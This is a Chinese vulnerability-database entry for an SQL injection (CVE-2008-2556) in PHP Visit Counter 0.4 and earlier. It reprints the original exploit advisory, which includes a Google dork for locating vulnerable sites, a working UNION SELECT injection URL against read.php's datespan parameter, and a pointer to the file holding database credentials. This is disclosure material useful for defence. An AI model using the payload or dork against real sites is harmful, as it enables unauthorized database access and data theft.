PHP Visit Counter 'read.php'SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115317 漏洞类型 SQL注入
发布时间 2008-05-31 更新时间 2008-06-05
CVE编号 CVE-2008-2556 CNNVD-ID CNNVD-200806-099
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/5703
https://www.securityfocus.com/bid/81312
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-099
|漏洞详情
PHPVisitCounter0.4以及之前的版本中的read.php存在SQL注入漏洞。远程攻击者可以借助读取操作中的datespan参数,执行任意的SQL指令。
|漏洞EXP
###############################################################
#
#           PHP Visit Counter <= 0.4 - SQL Injection Vulnerability
#                                                             
#      Vulnerability discovered by: Lidloses_Auge             
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
#                                   GPM, Free-Hack, Ciphercrew, h4ck-y0u
#      Date:                        30.05.2008
#
###############################################################
#                                                             
#      Dork:  inurl:"read.php?datespan="
#
#      Vulnerability:
#
#      1.) SQL Injection
#
#         1.1.) [Target]/read.php?action=read&cat=portal&datespan=null+group+by+null+union+select+1,2,ascii(substring(version(),1,1))/*
#
#      Notes:
#
#         Output is displayed as INT, so you've to convert it into ascii and
#         scan every single letter to get the whole name.
#         MySQL Data is stored in [Counterpath]/variables.php
#
###############################################################

# milw0rm.com [2008-05-31]
|受影响的产品
Hessel Brouwer PHP Visit Counter 0.4
|参考资料

来源:XF
名称:phpvisitcounter-read-sql-injection(42789)
链接:http://xforce.iss.net/xforce/xfdb/42789
来源:MILW0RM
名称:5703
链接:http://www.milw0rm.com/exploits/5703